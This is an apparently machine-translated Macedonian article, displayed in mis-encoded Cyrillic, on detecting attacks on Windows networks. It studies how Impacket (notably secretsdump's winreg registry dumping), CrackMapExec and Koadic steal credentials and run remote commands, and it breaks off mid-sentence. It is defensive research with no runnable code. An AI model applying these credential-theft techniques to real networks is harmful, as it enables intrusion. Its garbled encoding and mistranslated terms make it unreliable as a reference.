Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ

Π‘Ρ€ΠΎΡ˜ΠΎΡ‚ Π½Π° Π½Π°ΠΏΠ°Π΄ΠΈ Π²ΠΎ ΠΊΠΎΡ€ΠΏΠΎΡ€Π°Ρ‚ΠΈΠ²Π½ΠΈΠΎΡ‚ сСктор растС сСкоја Π³ΠΎΠ΄ΠΈΠ½Π°: Π½Π° ΠΏΡ€ΠΈΠΌΠ΅Ρ€ Π²ΠΎ 2017 Π³ΠΎΠ΄ΠΈΠ½Π° сС Π·Π°Π±Π΅Π»Π΅ΠΆΠ°Π½ΠΈ 13% повСќС ΡƒΠ½ΠΈΠΊΠ°Ρ‚Π½ΠΈ ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚ΠΈ ΠΎΡ‚ΠΊΠΎΠ»ΠΊΡƒ Π²ΠΎ 2016 Π³ΠΎΠ΄ΠΈΠ½Π°, Π° Π½Π° ΠΊΡ€Π°Ρ˜ΠΎΡ‚ Π½Π° 2018 Π³ΠΎΠ΄ΠΈΠ½Π° - 27% повСќС ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚ΠΈΠΎΡ‚ΠΊΠΎΠ»ΠΊΡƒ Π²ΠΎ ΠΏΡ€Π΅Ρ‚Ρ…ΠΎΠ΄Π½ΠΈΠΎΡ‚ ΠΏΠ΅Ρ€ΠΈΠΎΠ΄. Π’ΠΊΠ»ΡƒΡ‡ΡƒΠ²Π°Ρ˜ΡœΠΈ Π³ΠΈ ΠΈ ΠΎΠ½ΠΈΠ΅ ΠΊΠ°Π΄Π΅ ΡˆΡ‚ΠΎ Π³Π»Π°Π²Π½Π°Ρ‚Π° Ρ€Π°Π±ΠΎΡ‚Π½Π° Π°Π»Π°Ρ‚ΠΊΠ° Π΅ ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΈΠ²Π½ΠΈΠΎΡ‚ систСм Windows. Π’ΠΎ 2017-2018 Π³ΠΎΠ΄ΠΈΠ½Π°, APT Dragonfly, APT28, APT MuddyWater ΠΈΠ·Π²Ρ€ΡˆΠΈ Π½Π°ΠΏΠ°Π΄ΠΈ Π²Ρ€Π· Π²Π»Π°Π΄ΠΈΠ½ΠΈ ΠΈ Π²ΠΎΠ΅Π½ΠΈ ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΈ Π²ΠΎ Π•Π²Ρ€ΠΎΠΏΠ°, Π‘Π΅Π²Π΅Ρ€Π½Π° АмСрика ΠΈ Баудиска ΠΡ€Π°Π±ΠΈΡ˜Π°. И Π½ΠΈΠ΅ користСвмС Ρ‚Ρ€ΠΈ Π°Π»Π°Ρ‚ΠΊΠΈ Π·Π° ΠΎΠ²Π° - Π£Π΄Π°Ρ€, CrackMapExec ΠΈ Коадиќ. Нивниот ΠΈΠ·Π²ΠΎΡ€Π΅Π½ ΠΊΠΎΠ΄ Π΅ ΠΎΡ‚Π²ΠΎΡ€Π΅Π½ ΠΈ достапСн Π½Π° GitHub.

Π’Ρ€Π΅Π΄ΠΈ Π΄Π° сС Π½Π°ΠΏΠΎΠΌΠ΅Π½Π΅ Π΄Π΅ΠΊΠ° ΠΎΠ²ΠΈΠ΅ Π°Π»Π°Ρ‚ΠΊΠΈ Π½Π΅ сС користат Π·Π° ΠΏΠΎΡ‡Π΅Ρ‚Π½Π° ΠΏΠ΅Π½Π΅Ρ‚Ρ€Π°Ρ†ΠΈΡ˜Π°, Ρ‚ΡƒΠΊΡƒ Π·Π° Ρ€Π°Π·Π²ΠΎΡ˜ Π½Π° Π½Π°ΠΏΠ°Π΄ Π²ΠΎ инфраструктурата. НапаѓачитС Π³ΠΈ користат Π²ΠΎ Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ Ρ„Π°Π·ΠΈ ΠΎΠ΄ Π½Π°ΠΏΠ°Π΄ΠΎΡ‚ ΠΏΠΎ ΠΏΠ΅Π½Π΅Ρ‚Ρ€Π°Ρ†ΠΈΡ˜Π°Ρ‚Π° Π½Π° ΠΏΠ΅Ρ€ΠΈΠΌΠ΅Ρ‚Π°Ρ€ΠΎΡ‚. Ова, ΠΈΠ½Π°ΠΊΡƒ, Π΅ Ρ‚Π΅ΡˆΠΊΠΎ Π΄Π° сС ΠΎΡ‚ΠΊΡ€ΠΈΠ΅ ΠΈ чСсто само со помош Π½Π° Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΡ˜Π°Ρ‚Π° ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΡƒΠ²Π°ΡšΠ΅ Π½Π° Ρ‚Ρ€Π°Π³ΠΈ Π½Π° компромис Π²ΠΎ ΠΌΡ€Π΅ΠΆΠ½ΠΈΠΎΡ‚ ΡΠΎΠΎΠ±Ρ€Π°ΡœΠ°Ρ˜ ΠΈΠ»ΠΈ Π°Π»Π°Ρ‚ΠΊΠΈ ΠΊΠΎΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π°Π°Ρ‚ ΠΎΡ‚ΠΊΡ€ΠΈΠ²Π°ΡšΠ΅ Π½Π° Π°ΠΊΡ‚ΠΈΠ²Π½ΠΈ Π΄Π΅Ρ˜ΡΡ‚Π²ΠΈΡ˜Π° Π½Π° Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ ΠΎΡ‚ΠΊΠ°ΠΊΠΎ Ρ‚ΠΎΡ˜ ќС Π½Π°Π²Π»Π΅Π·Π΅ Π²ΠΎ инфраструктурата. АлаткитС ΠΎΠ±Π΅Π·Π±Π΅Π΄ΡƒΠ²Π°Π°Ρ‚ Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ, ΠΎΠ΄ прСнос Π½Π° Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠΈ Π΄ΠΎ ΠΈΠ½Ρ‚Π΅Ρ€Π°ΠΊΡ†ΠΈΡ˜Π° со рСгистарот ΠΈ ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ Π½Π° ΠΎΠ΄Π΄Π°Π»Π΅Ρ‡Π΅Π½Π° машина. Π‘ΠΏΡ€ΠΎΠ²Π΅Π΄ΠΎΠ²ΠΌΠ΅ ΡΡ‚ΡƒΠ΄ΠΈΡ˜Π° Π·Π° ΠΎΠ²ΠΈΠ΅ Π°Π»Π°Ρ‚ΠΊΠΈ Π·Π° Π΄Π° ја ΠΎΠ΄Ρ€Π΅Π΄ΠΈΠΌΠ΅ Π½ΠΈΠ²Π½Π°Ρ‚Π° ΠΌΡ€Π΅ΠΆΠ½Π° активност.

Π¨Ρ‚ΠΎ Ρ‚Ρ€Π΅Π±Π°ΡˆΠ΅ Π΄Π° Π½Π°ΠΏΡ€Π°Π²ΠΈΠΌΠ΅:

  • Π Π°Π·Π±Π΅Ρ€Π΅Ρ‚Π΅ ΠΊΠ°ΠΊΠΎ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½ΠΈΡ€Π°Π°Ρ‚ Π°Π»Π°Ρ‚ΠΊΠΈΡ‚Π΅ Π·Π° Ρ…Π°ΠΊΠΈΡ€Π°ΡšΠ΅. Π”ΠΎΠ·Π½Π°Ρ˜Ρ‚Π΅ ΡˆΡ‚ΠΎ Ρ‚Ρ€Π΅Π±Π° Π΄Π° искористат Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΈΡ‚Π΅ ΠΈ ΠΊΠΎΠΈ Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ ΠΌΠΎΠΆΠ°Ρ‚ Π΄Π° Π³ΠΈ користат.
  • ΠΠ°Ρ˜Π΄Π΅Ρ‚Π΅ Π³ΠΎ ΠΎΠ½Π° ΡˆΡ‚ΠΎ Π½Π΅ Π΅ ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Π½ΠΎ ΠΎΠ΄ Π°Π»Π°Ρ‚ΠΊΠΈΡ‚Π΅ Π·Π° бСзбСдност Π½Π° ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ Π²ΠΎ ΠΏΡ€Π²ΠΈΡ‚Π΅ Ρ„Π°Π·ΠΈ ΠΎΠ΄ Π½Π°ΠΏΠ°Π΄ΠΎΡ‚. Π€Π°Π·Π°Ρ‚Π° Π½Π° ΠΈΠ·Π²ΠΈΠ΄ΡƒΠ²Π°ΡšΠ΅ ΠΌΠΎΠΆΠ΅ Π΄Π° сС прСскокнС, ΠΈΠ»ΠΈ Π·Π°Ρ‚ΠΎΠ° ΡˆΡ‚ΠΎ Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ Π΅ Π²Π½Π°Ρ‚Ρ€Π΅ΡˆΠ΅Π½ Π½Π°ΠΏΠ°Ρ“Π°Ρ‡, ΠΈΠ»ΠΈ Π·Π°Ρ‚ΠΎΠ° ΡˆΡ‚ΠΎ Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ Сксплоатира Π΄ΡƒΠΏΠΊΠ° Π²ΠΎ инфраструктурата која ΠΏΡ€Π΅Ρ‚Ρ…ΠΎΠ΄Π½ΠΎ Π½Π΅ Π±ΠΈΠ»Π° ΠΏΠΎΠ·Π½Π°Ρ‚Π°. Π‘Ρ‚Π°Π½ΡƒΠ²Π° Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ Π΄Π° сС Π²Ρ€Π°Ρ‚ΠΈ Ρ†Π΅Π»ΠΈΠΎΡ‚ ΡΠΈΠ½ΡŸΠΈΡ€ Π½Π° Π½Π΅Π³ΠΎΠ²ΠΈΡ‚Π΅ постапки, ΠΏΠ° ΠΎΡ‚Ρ‚ΡƒΠΊΠ° ΠΈ ΠΆΠ΅Π»Π±Π°Ρ‚Π° Π΄Π° сС ΠΎΡ‚ΠΊΡ€ΠΈΠ΅ ΠΏΠΎΠ½Π°Ρ‚Π°ΠΌΠΎΡˆΠ½ΠΎ двиТСњС.
  • Π•Π»ΠΈΠΌΠΈΠ½ΠΈΡ€Π°Ρ˜Ρ‚Π΅ Π³ΠΈ Π»Π°ΠΆΠ½ΠΈΡ‚Π΅ ΠΏΠΎΠ·ΠΈΡ‚ΠΈΠ²ΠΈ ΠΎΠ΄ Π°Π»Π°Ρ‚ΠΊΠΈΡ‚Π΅ Π·Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ²Π°ΡšΠ΅ Π½Π° ΡƒΠΏΠ°Π΄. НС смССмС Π΄Π° Π·Π°Π±ΠΎΡ€Π°Π²ΠΈΠΌΠ΅ Π΄Π΅ΠΊΠ° ΠΊΠΎΠ³Π° ΠΎΠ΄Ρ€Π΅Π΄Π΅Π½ΠΈ Π΄Π΅Ρ˜ΡΡ‚Π²Π° сС ΠΎΡ‚ΠΊΡ€ΠΈΠ²Π°Π°Ρ‚ само Π²Ρ€Π· основа Π½Π° ΠΈΠ·Π²ΠΈΠ΄ΡƒΠ²Π°ΡšΠ΅, ΠΌΠΎΠΆΠ½ΠΈ сС чСсти Π³Ρ€Π΅ΡˆΠΊΠΈ. Π’ΠΎΠΎΠ±ΠΈΡ‡Π°Π΅Π½ΠΎ Π²ΠΎ инфраструктурата ΠΈΠΌΠ° Π΄ΠΎΠ²ΠΎΠ»Π΅Π½ Π±Ρ€ΠΎΡ˜ Π½Π°Ρ‡ΠΈΠ½ΠΈ, ΠΊΠΎΠΈ Π½Π΅ сС Ρ€Π°Π·Π»ΠΈΠΊΡƒΠ²Π°Π°Ρ‚ ΠΎΠ΄ Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½ΠΈΡ‚Π΅ Π½Π° ΠΏΡ€Π² ΠΏΠΎΠ³Π»Π΅Π΄, Π·Π° Π΄Π° сС Π΄ΠΎΠ±ΠΈΠ΅ ΠΊΠ°ΠΊΠ²Π° Π±ΠΈΠ»ΠΎ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡ˜Π°.

Π¨Ρ‚ΠΎ ΠΈΠΌ Π΄Π°Π²Π°Π°Ρ‚ ΠΎΠ²ΠΈΠ΅ Π°Π»Π°Ρ‚ΠΊΠΈ Π½Π° Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΈΡ‚Π΅? Ако ΠΎΠ²Π° Π΅ Impacket, Ρ‚ΠΎΠ³Π°Ρˆ Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΈΡ‚Π΅ Π΄ΠΎΠ±ΠΈΠ²Π°Π°Ρ‚ Π³ΠΎΠ»Π΅ΠΌΠ° Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ° Π½Π° ΠΌΠΎΠ΄ΡƒΠ»ΠΈ ΠΊΠΎΠΈ ΠΌΠΎΠΆΠ°Ρ‚ Π΄Π° сС користат Π²ΠΎ Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ Ρ„Π°Π·ΠΈ ΠΎΠ΄ Π½Π°ΠΏΠ°Π΄ΠΎΡ‚ ΡˆΡ‚ΠΎ слСдат ΠΏΠΎ ΠΏΡ€ΠΎΠ±ΠΈΠ²Π°ΡšΠ΅ Π½Π° ΠΏΠ΅Ρ€ΠΈΠΌΠ΅Ρ‚Π°Ρ€ΠΎΡ‚. ΠœΠ½ΠΎΠ³Ρƒ Π°Π»Π°Ρ‚ΠΊΠΈ користат Impacket ΠΌΠΎΠ΄ΡƒΠ»ΠΈ Π²Π½Π°Ρ‚Ρ€Π΅ΡˆΠ½ΠΎ - Π½Π° ΠΏΡ€ΠΈΠΌΠ΅Ρ€, Metasploit. Има dcomexec ΠΈ wmiexec Π·Π° далСчинско ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ, secretsdump Π·Π° добивањС смСтки ΠΎΠ΄ ΠΌΠ΅ΠΌΠΎΡ€ΠΈΡ˜Π°Ρ‚Π° ΡˆΡ‚ΠΎ сС Π΄ΠΎΠ΄Π°Π΄Π΅Π½ΠΈ ΠΎΠ΄ Impacket. Како Ρ€Π΅Π·ΡƒΠ»Ρ‚Π°Ρ‚ Π½Π° Ρ‚ΠΎΠ°, ΠΏΡ€Π°Π²ΠΈΠ»Π½ΠΎΡ‚ΠΎ ΠΎΡ‚ΠΊΡ€ΠΈΠ²Π°ΡšΠ΅ Π½Π° активноста Π½Π° Ρ‚Π°ΠΊΠ²Π°Ρ‚Π° Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ° ќС ΠΎΠ±Π΅Π·Π±Π΅Π΄ΠΈ ΠΎΡ‚ΠΊΡ€ΠΈΠ²Π°ΡšΠ΅ Π½Π° Π΄Π΅Ρ€ΠΈΠ²Π°Ρ‚ΠΈ.

НС Π΅ ΡΠ»ΡƒΡ‡Π°Ρ˜Π½ΠΎ ΡˆΡ‚ΠΎ ΠΊΡ€Π΅Π°Ρ‚ΠΎΡ€ΠΈΡ‚Π΅ напишаа β€žPowered by Impacketβ€œ Π·Π° CrackMapExec (ΠΈΠ»ΠΈ Сдноставно CME). ΠŸΠΎΠΊΡ€Π°Ρ˜ Ρ‚ΠΎΠ°, CME ΠΈΠΌΠ° Π³ΠΎΡ‚ΠΎΠ²Π° функционалност Π·Π° ΠΏΠΎΠΏΡƒΠ»Π°Ρ€Π½ΠΈ ΡΡ†Π΅Π½Π°Ρ€ΠΈΡ˜Π°: Mimikatz Π·Π° добивањС Π»ΠΎΠ·ΠΈΠ½ΠΊΠΈ ΠΈΠ»ΠΈ Π½ΠΈΠ²Π½ΠΈ Ρ…Π°ΡˆΠΎΠ²ΠΈ, ΠΈΠΌΠΏΠ»Π΅ΠΌΠ΅Π½Ρ‚Π°Ρ†ΠΈΡ˜Π° Π½Π° Meterpreter ΠΈΠ»ΠΈ Empire Π°Π³Π΅Π½Ρ‚ Π·Π° далСчинско ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ ΠΈ Bloodhound Π½Π° ΠΎΠ΄Π±ΠΎΡ€ΠΎΡ‚.

Π’Ρ€Π΅Ρ‚Π°Ρ‚Π° Π°Π»Π°Ρ‚ΠΊΠ° ΡˆΡ‚ΠΎ ја ΠΈΠ·Π±Ρ€Π°Π²ΠΌΠ΅ бСшС Koadic. Вој Π΅ сосСма нСодамнСшСн, бСшС прСтставСн Π½Π° ΠΌΠ΅Ρ“ΡƒΠ½Π°Ρ€ΠΎΠ΄Π½Π°Ρ‚Π° хакСрска ΠΊΠΎΠ½Ρ„Π΅Ρ€Π΅Π½Ρ†ΠΈΡ˜Π° DEFCON 25 Π²ΠΎ 2017 Π³ΠΎΠ΄ΠΈΠ½Π° ΠΈ сС ΠΎΠ΄Π»ΠΈΠΊΡƒΠ²Π° со нСстандардСн пристап: Ρ€Π°Π±ΠΎΡ‚ΠΈ ΠΏΡ€Π΅ΠΊΡƒ HTTP, Java Script ΠΈ Microsoft Visual Basic Script (VBS). Овој пристап сС Π½Π°Ρ€Π΅ΠΊΡƒΠ²Π° ТивССњС Π½Π°Π΄Π²ΠΎΡ€ ΠΎΠ΄ Π·Π΅ΠΌΡ˜Π°Ρ‚Π°: Π°Π»Π°Ρ‚ΠΊΠ°Ρ‚Π° користи Π·Π±ΠΈΡ€ Π½Π° зависности ΠΈ Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠΈ Π²Π³Ρ€Π°Π΄Π΅Π½ΠΈ Π²ΠΎ Windows. ΠšΡ€Π΅Π°Ρ‚ΠΎΡ€ΠΈΡ‚Π΅ Π³ΠΎ Π½Π°Ρ€Π΅ΠΊΡƒΠ²Π°Π°Ρ‚ COM Command & Control, ΠΈΠ»ΠΈ C3.

IMPACKET

Ѐункционалноста Π½Π° Impacket Π΅ ΠΌΠ½ΠΎΠ³Ρƒ ΡˆΠΈΡ€ΠΎΠΊΠ°, ΠΏΠΎΡ‡Π½ΡƒΠ²Π°Ρ˜ΡœΠΈ ΠΎΠ΄ ΠΈΠ·Π²ΠΈΠ΄ΡƒΠ²Π°ΡšΠ΅ Π²ΠΎ AD ΠΈ ΡΠΎΠ±ΠΈΡ€Π°ΡšΠ΅ ΠΏΠΎΠ΄Π°Ρ‚ΠΎΡ†ΠΈ ΠΎΠ΄ Π²Π½Π°Ρ‚Ρ€Π΅ΡˆΠ½ΠΈ MS SQL сСрвСри, Π΄ΠΎ Ρ‚Π΅Ρ…Π½ΠΈΠΊΠΈ Π·Π° добивањС Π°ΠΊΡ€Π΅Π΄ΠΈΡ‚ΠΈΠ²ΠΈ: ΠΎΠ²Π° Π΅ SMB Ρ€Π΅Π»Π΅ Π½Π°ΠΏΠ°Π΄ ΠΈ добивањС Π½Π° Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ°Ρ‚Π° ntds.dit која содрТи Ρ…Π°Ρˆ Π½Π° кориснички Π»ΠΎΠ·ΠΈΠ½ΠΊΠΈ ΠΎΠ΄ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π΅Ρ€ Π½Π° Π΄ΠΎΠΌΠ΅Π½. Impacket, исто Ρ‚Π°ΠΊΠ°, ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ ΠΎΠ΄ Π΄Π°Π»Π΅Ρ‡ΠΈΠ½Π° ΠΊΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ Ρ‡Π΅Ρ‚ΠΈΡ€ΠΈ Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ ΠΌΠ΅Ρ‚ΠΎΠ΄ΠΈ: WMI, Услуга Π·Π° ΡƒΠΏΡ€Π°Π²ΡƒΠ²Π°ΡšΠ΅ со распорСдувач Π½Π° Windows, DCOM ΠΈ SMB ΠΈ Π±Π°Ρ€Π° ΠΈΠ½Π³Π΅Ρ€Π΅Π½Ρ†ΠΈΠΈ Π·Π° Ρ‚ΠΎΠ°.

Secretsdump

АјдС Π΄Π° ΠΏΠΎΠ³Π»Π΅Π΄Π½Π΅ΠΌΠ΅ Π²ΠΎ secretsdump. Ова Π΅ ΠΌΠΎΠ΄ΡƒΠ» кој ΠΌΠΎΠΆΠ΅ Π΄Π° Π³ΠΈ Ρ‚Π°Ρ€Π³Π΅Ρ‚ΠΈΡ€Π° ΠΈ корисничкитС машини ΠΈ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΠΎΡ€ΠΈΡ‚Π΅ Π½Π° Π΄ΠΎΠΌΠ΅Π½ΠΈ. МоТС Π΄Π° сС користи Π·Π° добивањС ΠΊΠΎΠΏΠΈΠΈ ΠΎΠ΄ мСморискитС области LSA, SAM, SECURITY, NTDS.dit, Ρ‚Π°ΠΊΠ° ΡˆΡ‚ΠΎ ΠΌΠΎΠΆΠ΅ Π΄Π° сС Π²ΠΈΠ΄ΠΈ Π²ΠΎ Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ Ρ„Π°Π·ΠΈ ΠΎΠ΄ Π½Π°ΠΏΠ°Π΄ΠΎΡ‚. ΠŸΡ€Π²ΠΈΠΎΡ‚ Ρ‡Π΅ΠΊΠΎΡ€ Π²ΠΎ Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚Π° Π½Π° ΠΌΠΎΠ΄ΡƒΠ»ΠΎΡ‚ Π΅ Π°Π²Ρ‚Π΅Π½Ρ‚ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π° ΠΏΡ€Π΅ΠΊΡƒ SMB, ΡˆΡ‚ΠΎ Π±Π°Ρ€Π° ΠΈΠ»ΠΈ Π»ΠΎΠ·ΠΈΠ½ΠΊΠ°Ρ‚Π° Π½Π° корисникот ΠΈΠ»ΠΈ Π½Π΅Ρ˜Π·ΠΈΠ½ΠΈΠΎΡ‚ Ρ…Π°Ρˆ Π·Π° автоматски Π΄Π° Π³ΠΎ ΠΈΠ·Π²Ρ€ΡˆΠΈ Π½Π°ΠΏΠ°Π΄ΠΎΡ‚ Pass the Hash. Π‘Π»Π΅Π΄Π½ΠΎ Π΄ΠΎΠ°Ρ“Π° Π±Π°Ρ€Π°ΡšΠ΅ Π΄Π° сС ΠΎΡ‚Π²ΠΎΡ€ΠΈ пристап Π΄ΠΎ Service Control Manager (SCM) ΠΈ Π΄Π° сС Π΄ΠΎΠ±ΠΈΠ΅ пристап Π΄ΠΎ рСгистарот ΠΏΡ€Π΅ΠΊΡƒ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΎΡ‚ winreg, со кој Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ ΠΌΠΎΠΆΠ΅ Π΄Π° Π³ΠΈ Π΄ΠΎΠ·Π½Π°Π΅ ΠΏΠΎΠ΄Π°Ρ‚ΠΎΡ†ΠΈΡ‚Π΅ ΠΎΠ΄ Π³Ρ€Π°Π½ΠΊΠΈΡ‚Π΅ ΠΎΠ΄ интСрСс ΠΈ Π΄Π° Π΄ΠΎΠ±ΠΈΠ΅ Ρ€Π΅Π·ΡƒΠ»Ρ‚Π°Ρ‚ΠΈ ΠΏΡ€Π΅ΠΊΡƒ SMB.

На сл. 1 Π³Π»Π΅Π΄Π°ΠΌΠ΅ ΠΊΠ°ΠΊΠΎ Ρ‚ΠΎΡ‡Π½ΠΎ ΠΊΠΎΠ³Π° сС користи ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΎΡ‚ winreg, пристапот сС Π΄ΠΎΠ±ΠΈΠ²Π° со помош Π½Π° ΠΊΠ»ΡƒΡ‡ Π·Π° рСгистар со LSA. Π—Π° Π΄Π° Π³ΠΎ Π½Π°ΠΏΡ€Π°Π²ΠΈΡ‚Π΅ ΠΎΠ²Π°, користСтС ја ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° DCERPC со ΠΎΠΏΡ‚ΠΈΡ‡ΠΊΠΈ ΠΊΠΎΠ΄ 15 - OpenKey.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 1. ΠžΡ‚Π²ΠΎΡ€Π°ΡšΠ΅ рСгистарски ΠΊΠ»ΡƒΡ‡ со помош Π½Π° ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΎΡ‚ winreg

Π‘Π»Π΅Π΄Π½ΠΎ, ΠΊΠΎΠ³Π° ќС сС Π΄ΠΎΠ±ΠΈΠ΅ пристап Π΄ΠΎ ΠΊΠ»ΡƒΡ‡ΠΎΡ‚, врСдноститС сС Π·Π°Ρ‡ΡƒΠ²ΡƒΠ²Π°Π°Ρ‚ со ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° SaveKey со ΠΎΠΏΡ‚ΠΈΡ‡ΠΊΠΈ ΠΊΠΎΠ΄ 20. Impacket Π³ΠΎ ΠΏΡ€Π°Π²ΠΈ Ρ‚ΠΎΠ° Π½Π° ΠΌΠ½ΠΎΠ³Ρƒ спСцифичСн Π½Π°Ρ‡ΠΈΠ½. Π“ΠΈ Π·Π°Ρ‡ΡƒΠ²ΡƒΠ²Π° врСдноститС Π²ΠΎ Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ° Ρ‡ΠΈΠ΅ ΠΈΠΌΠ΅ Π΅ Π½ΠΈΠ·Π° ΠΎΠ΄ 8 ΡΠ»ΡƒΡ‡Π°Ρ˜Π½ΠΈ Π·Π½Π°Ρ†ΠΈ Π΄ΠΎΠ΄Π°Π΄Π΅Π½ΠΈ со .tmp. Π”ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»Π½ΠΎ, ΠΏΠΎΠ½Π°Ρ‚Π°ΠΌΠΎΡˆΠ½ΠΎΡ‚ΠΎ ΠΏΠΎΡΡ‚Π°Π²ΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΎΠ²Π°Π° Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ° сС случува ΠΏΡ€Π΅ΠΊΡƒ SMB ΠΎΠ΄ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡƒΠΌΠΎΡ‚ System32 (сл. 2).

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 2. Π¨Π΅ΠΌΠ° Π·Π° добивањС рСгистарски ΠΊΠ»ΡƒΡ‡ ΠΎΠ΄ ΠΎΠ΄Π΄Π°Π»Π΅Ρ‡Π΅Π½Π° машина

Π˜Π·Π»Π΅Π³ΡƒΠ²Π° Π΄Π΅ΠΊΠ° Ρ‚Π°ΠΊΠ²Π°Ρ‚Π° активност Π½Π° ΠΌΡ€Π΅ΠΆΠ°Ρ‚Π° ΠΌΠΎΠΆΠ΅ Π΄Π° сС ΠΎΡ‚ΠΊΡ€ΠΈΠ΅ со ΠΏΡ€Π°ΡˆΠ°ΡšΠ° Π΄ΠΎ ΠΎΠ΄Ρ€Π΅Π΄Π΅Π½ΠΈ Π³Ρ€Π°Π½ΠΊΠΈ Π½Π° рСгистарот ΠΊΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ Π³ΠΎ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΎΡ‚ winreg, спСцифични имиња, ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ ΠΈ Π½ΠΈΠ²Π½ΠΈΠΎΡ‚ рСдослСд.

Овој ΠΌΠΎΠ΄ΡƒΠ», исто Ρ‚Π°ΠΊΠ°, остава Ρ‚Ρ€Π°Π³ΠΈ Π²ΠΎ Π΄Π½Π΅Π²Π½ΠΈΠΊΠΎΡ‚ Π·Π° настани Π½Π° Windows, ΡˆΡ‚ΠΎ Π³ΠΎ олСснува ΠΎΡ‚ΠΊΡ€ΠΈΠ²Π°ΡšΠ΅Ρ‚ΠΎ. На ΠΏΡ€ΠΈΠΌΠ΅Ρ€, ΠΊΠ°ΠΊΠΎ Ρ€Π΅Π·ΡƒΠ»Ρ‚Π°Ρ‚ Π½Π° ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π°

